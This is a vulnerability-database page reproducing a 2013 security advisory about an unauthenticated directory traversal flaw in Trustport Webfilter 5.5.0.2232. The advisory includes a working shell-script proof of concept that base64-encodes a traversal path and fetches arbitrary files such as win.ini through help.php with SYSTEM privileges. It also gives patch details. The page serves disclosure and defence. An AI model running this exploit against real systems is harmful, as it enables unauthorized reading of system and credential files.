Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Trustport Webfilter Traversal / File Disclosure

🗓️ 08 Aug 2013 00:00:00Reported by Oliver KarowType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Trustport Webfilter Remote File Access Vulnerability allows remote attacker to access files outside webroot without authentication. Affected version 5.5.0.2232 on Microsoft Windows. Exploit uses help.php script with crafted GET-request

Code
`Trustport Webfilter Remote File Access Vulnerability  
====================================================  
  
Affected Product  
----------------  
  
Product Name: Trustport Webfilter  
Product Version: 5.5.0.2232  
Platform: Microsoft Windows  
  
Product/Company Information  
---------------------------  
  
From Trustports website:  
  
"An advanced solution for the protection and optimization of web   
traffic within your company network.  
It enables both monitoring and directing of users web activities.  
It also utilizes your internet connectivity, and reduces the risk of   
virus infections.  
Contributes to protecting the reputation of your company."  
  
Trustports website can be found at www.trustport.com  
  
Vulnerability Description  
-------------------------  
  
A vulnerability exists within the help.php script, allowing an remote   
attacker to access files outside of the  
webroot with SYSTEM privileges, without authentication.  
  
In order to exploit this vulnerability, an attacker has to craft a   
special GET-request, with a base64 encoded  
directory traversal string and file name (see Exploit section).  
  
  
Exploit  
-------  
  
#!/bin/sh  
#  
# PoC Exploit for trustport TrustPort_Webfilter_5.5.0.2232  
# Usage: ./exploit.sh <IP> <path/filename>  
# Example: ./exploit.sh 192.168.42.130 ../../../../../Windows/win.ini  
  
# [email protected]  
  
MY_IP=$1  
MY_FILE=$(echo -n $2| base64)  
MY_CONSOLEPORT='4849'  
  
if [ $# -eq 0 ]  
then  
echo "Usage: `basename $0` <ip> <path/filename>"  
exit  
fi  
  
echo -e "GET /help.php?hf=$MY_FILE HTTP/1.0\n\n\n\n" | openssl s_client   
-connect $MY_IP:$MY_CONSOLEPORT -quiet  
  
Patch Information  
-----------------  
  
A patch is available from vendor.  
Corrected Build is: 6.0.0.3033  
  
Advisory Information  
--------------------  
  
http://www.oliverkarow.de/research/trustport.txt  
  
History  
-------  
  
26/07/2013 - Initial contact with vendor  
26/07/2013 - Response from vendor  
30/07/2013 - Patch information provided by vendor  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Aug 2013 00:00Current
7.4High risk
Vulners AI Score7.4
trustport webfilterremote file accessvulnerabilitymicrosoft windowsexploitpatchdirectory traversalsystem privilegesbase64 encodingvendor patchadvisory information
23